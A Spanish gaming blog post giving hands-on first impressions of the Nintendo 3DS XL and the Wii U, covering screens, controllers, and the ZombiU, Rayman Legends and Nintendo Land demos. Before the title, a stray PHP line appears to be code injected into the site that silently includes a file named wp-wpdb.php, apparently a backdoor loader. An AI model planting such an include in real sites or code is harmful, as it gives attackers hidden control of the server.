if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Primeras Impresiones Nintendo 3DS XL y WII U – La Fortaleza de LeChuck

Primeras Impresiones Nintendo 3DS XL y WII U

Hace unos días he tenido oportunidad de probar estas dos próximas consolas de Nintendo que saldrán al mercado este mismo año, pero todavía hay muchas inquietudes por parte de los gamers. Por un lado, Nintendo 3DS XL es una versión nueva de Nintendo 3DS con las pantallas más grandes, y comporta el debate de si tenían que haber añadido directamente el segundo stick o no, ya que no lo tiene y ya se ha anunciado un Circle Pad Pro XL. Por otro lado tenemos a Wii U, que llega con una buena remesa de juegos de salida, pero no acaba de convencer por su potencia, pareciendo ser similar a las actuales sobremesa de la competencia. Intentaré mojarme con mi opinión y responder las dudas que asaltan vuestra cabeza.

Opinión Nintendo 3DS XL
Las sensaciones han sido claras y sencillas, como pensé con Nintendo DSi XL, es una gran idea. Nintendo sabe que la gente adulta en general, cuando mira una portátil dice «pero chico, ¿ya ves algo en esa pantallita?». No les llama la atención para nada usar algo tan pequeño y al sacar varios juegos promocionados para todas las edades (Brain Training, etc) chocaba bastante, se pedía a gritos una mayor pantalla. Nintendo 3DS XL sigue esa estela. Muchos cambiamos nuestras Nintendo DSi XL por una Nintendo 3DS y los cambios a menor nunca les ha gustado a nadie, y menos en cuestión de pantallas. Señores, el tamaño importa.

En cuánto al diseño externo, Nintendo 3DS XL es realmente bonita, pese a su material plástico de siempre, el acabado redondeado la hace incluso más cómoda que Nintendo DSi XL, aunque recuerda muchísimo a esta en todo. Incluida la comodidad. Nintendo 3DS se me hacía realmente bastante incómoda, más que DS Lite o DSi, por sus bordes angulados y eso con este tamaño y esos bordes redondeados cambia muchísimo para bien. Recordemos que al ser más grande, se pierde bastante en portabilidad, pero sinceramente las porátiles son cada día más «consolas de estar por casa cómodas». Algo así como jugar en cualquier sitio sin que te molesten, y fáciles de portar a otro sitio, pero no para jugar en cualquier sitio, pues al sol, por ejemplo, ninguna consola portátil se ve medianamente bien.
La pantalla 3D pasa a ser panorámica, y su tamaño es descomunal, aunque no alcanza la pantalla de PS Vita (4,8″ VS 5,3″). Uno de los debates que rondaban entre los fans es si al conservar la misma resolución se resentiría la nitidez. Para mi, era totalmente lógico que fuese la misma resolución, ya que un cambio si convertiría esta Nintendo 3DS XL en una revisión de Nintendo 3DS, y no una versión simplemente más grande (Necesitaría más potencia, quedaría una compatibilidad afeada de los juegos anteriores, etc). La respuesta al debate, ya la tenía de la experiencia de tener Nintendo DS Lite, DSi y XL, y es no. La pantalla se sigue viendo igual que Nintendo 3DS. El experimento es sencillo, coged vuestra Nintendo 3DS como la cogeríais habitualmente, y acercaos a ella 5 centímetros. Eso es la pantalla de N3DS XL. La misma resolución, pero más grande. Es decir, siguen sus jaggies, y sus defectillos de una resolución mediana, pero sigue viéndose decentemente, y el efecto 3D agradece un montón el tener una pantalla de buen tamaño para todo el contenido audiovisual que está metiendo Nintendo en la consola, además de los juegos.

En cuánto al debate sobre el segundo stick, continuamos con el problema. Si hubieran puesto segundo stick, también habrían quejas, ya sería una revisión y no una versión. Además, ya han dejado claro, o eso creo que han querido hacer, que el segundo stick va a seguir, pese a quién le pese, en segundo plano y jamás va a ser indispensable para ningún juego. El Circle Pad Pro seguirá siendo opcional, el problema de diseño que se tuvo al principio no se va a corregir ahora, y solo darán esa opción para ports que hayan nacido para un segundo stick y pueda ser útil para algunos jugadores, nada más.
Opinión Wii U
Antes de probar Wii U, todos sabemos que es difícil que nos sorprenda. A poco que hayamos probado una tablet y una buena consola, sabemos que la combinación puede ser buena mientras no pierda los benditos botones y sticks. Creo que con la primera Wii, todos queríamos probar para ver hasta donde llegaba esa detección que en varios trailers nos pintaba como la auténtica realidad, y aunque todos nos divirtiéramos, al final todos supimos de la poca realidad del WiiMote con el mismísimo Wii Sports que funcionaba a base de golpes y ritmo más que detectar con realismo nuestros movimientos.

Con Wii U es diferente, sabes de que va, la pruebas y realmente te sorprende. Es decir, el hype va a la inversa que con Wii. Wii U propone algo mucho menos arriesgado que Wii en su día, algo que miras y dices «Es interesante y un paso bastante lógico». Y cuando la pruebas es cuando notas su potencial inmersivo dándole una vuelta de tuerca a la jugabilidad.
Un poco de historia. Todos sabemos que Nintendo está bastante obsesionada con tener más de una pantalla. La «idea» de Wii U, ya la tuvimos hace mucho en la misma Gamecube, con su empeño de enchufar muchas GameBoy Advance y hacernos jugar a Zelda Four Swords y Final Fantasy Crystal Chronicles, juegazos que dificilmente pudimos probar nosotros como a Nintendo le habría gustado. Todos decíamos «En Japón debe ser fácil encontrar a cuatro amigos con GameBoy Advance y su cable y jugar todos juntos», pero aquí tenías que buscar en foros a cuatro frikis como tu que tuvieran tales cacharros para poder echar una partida en casa de algún desconocido. No pasó de una idea alocada, y aunque todos preveíamos una potenciación de esa idea en algún momento de la historia de Nintendo, han sabido aprovechar la revolución de las tablets para sacar este Wii U Gamepad especial.
El Gamepad de Wii U está bien diseñado y se siente bastante ligero en las manos. Es realmente cómodo y sorprende la disposición de los sticks, dando protagonismo a éstos y a la pantalla táctil más que a los clásicos botones Nintendo -a,b,x,y-. Es una pena el que la táctil sea resistiva y no multitáctil, ya sabemos la obsesión que tiene Nintendo en mantener unos buenos márgenes de beneficio por consola vendida, y está claro que en Wii U seguirá siendo así, aún sin saber el precio de salida.
El Wii U Pro Controller también me ha parecido super cómodo, con un peso muy parecido al Dual Shock de Sony, y un tamaño y diseño muy parecido al de Xbox 360. La mayor diferencia, como pasaba con el Wii U Gamepad, es la disposición de los sticks, que acogen todo el protagonismo respecto a los botones. Soy pro-mando de Xbox 360, así que no puedo hacer otra cosa más que adorar este nuevo mando de Nintendo. Ojalá lo pueda utilizar mucho (Todavía no está muy claro cuando podremos y cuando no, utilizarlo).
Pudimos probar varios juegos, entre ellos Zombie U, Rayman Legends y Nintendo Land (Minijuego de Luigi’s Mansion). Sí, de Super Mario Bros U pasamos, no aporta mucho más, ¡aunque se ve muy nítido en HD!.
Zombie U

Probamos tanto la demo multijugador como la de un sólo jugador. En la multijugador hice de «Superviviente» en un modo de capturar banderas, y usaba el Wii U Pro Controller. Veía mi personaje en primera persona como cualquier «FPS», mientras que el segundo jugador veía el mapa desde una perspectiva cenital en el Wii U Gamepad, y enviaba zombies a las banderas, ganando dinero si me mataba para usar zombies más habilidosos. Mi superviviente era capaz de cargarse a los zombies en un momento, además de capturar más rápidamente las banderas. Un modo realmente curioso, combinando un juego similar a los tower defense (con lo que le gusta a Elaine el Plants VS Zombies se le vió bastante viciada) en la táctil y un FPS normal en la TV. Bastante interesantes las dos, con este mando es fácil proponer algo diferente, veamos como lo trasladan a un más que posible multijugador online.
El modo para un solo jugador es algo que tenemos más visto, nuestro superviviente usa los objetos de la mochila y que recoge por el camino desde la pantalla táctil sin pausa alguna, cosa que mete más tensión, en esos momentos puede venir un Zombie perfectamente. Si acaban matándote (la demo estaba diseñada para que murieras, de repente te ves con un montón de zombies y sin balas) pasarás a jugar con otro superviviente, y podrás recuperar tus objetos si matas a tu anterior superviviente, que no dudará en atacarte como zombie. Me pasé un buen rato jugando y puedo decir que resulta muy interesante. Técnicamente es normalete (respecto a PS3 o Xbox 360, claro), aunque como sabéis, es un juego que todavía está depurándose y esperemos que sea sorprendente también en este aspecto.
Rayman Legends

El nivel que pudimos probar era musical. Esta vez controlé en dos turnos tanto al «bicho volador» con la táctil del Wii U Gamepad, como a Rayman con el Wii U Pro Controller. Jugar con alguien a un plataformas y con dos sistemas de control diferentes era bastante gracioso, está muy bien implementado. Al ritmo de la música uno iba tocando en la táctil varios objetos y enemigos que surgían por el escenario, repercutiendo en ciertas cosas al jugador que controlaba a Rayman. En esta pantalla el scroll horizontal te barría así que era de correr y saltar a lo loco y al ritmo de la música. Wally y yo nos pegamos unas buenas risas con nuestra torpeza musical. Está claro que el modo dos jugadores es muy al estilo «Super Mario Galaxy«, y aunque no se haya anunciado todavía, apuesto a que tendrá un modo de un jugador sin ningún problema al estilo del gran Rayman Origins.

Nintendo Land (Luigi’s Mansion)

Un minijuego ya visto en varios videos, en el que uno hace de fantasma en el Wii U Gamepad mientras los demás mueven sus personajes en TV con el Wiimote en horizontal. Una fusión de los clásicos juegos «pilla-pilla» y «escondite» que cobra sentido gracias al mando de Wii U. El jugador que mueve el fantasma juega mirando su pantalla en el Wii U Gamepad, y busca coger desprevenidos a los demás jugadores para atraparlos y dejarlos insconcientes. El único arma de los demás será formar equipo y una linterna, con la que alumbraremos al fantasma para absorber su energía. Además podrán despertar a los compañeros caídos con el riesgo de que también te atrape el fantasma. El mando vibra cuando tienes cerca el fantasma, y lo ideal es avisar a los demás y hacer equipo para rastrear la zona y pillar al fantasma. Las mayores risas del evento salían de Nintendo Land.

Yo y Wally a tope probándola

Como véis mis impresiones en general son buenas. Wii U tiene un gran porvenir y solo necesita un buen precio, mucha publicidad, y buen software que acompañe, para alejarse lo suficiente de la larga sombra de Wii y sus no-third party.

Publicada el
Categorizado como Opinión

Por Museboy

Como la mayoría de vosotros, crecí jugando a videojuegos y ahora intento transmitir toda la pasión por este mundo en La Fortaleza de LeChuck. También busco ofertas de videojuegos. Seguidme en Twitter y sabréis de qué hablo.

6 comentarios

Dejar un comentario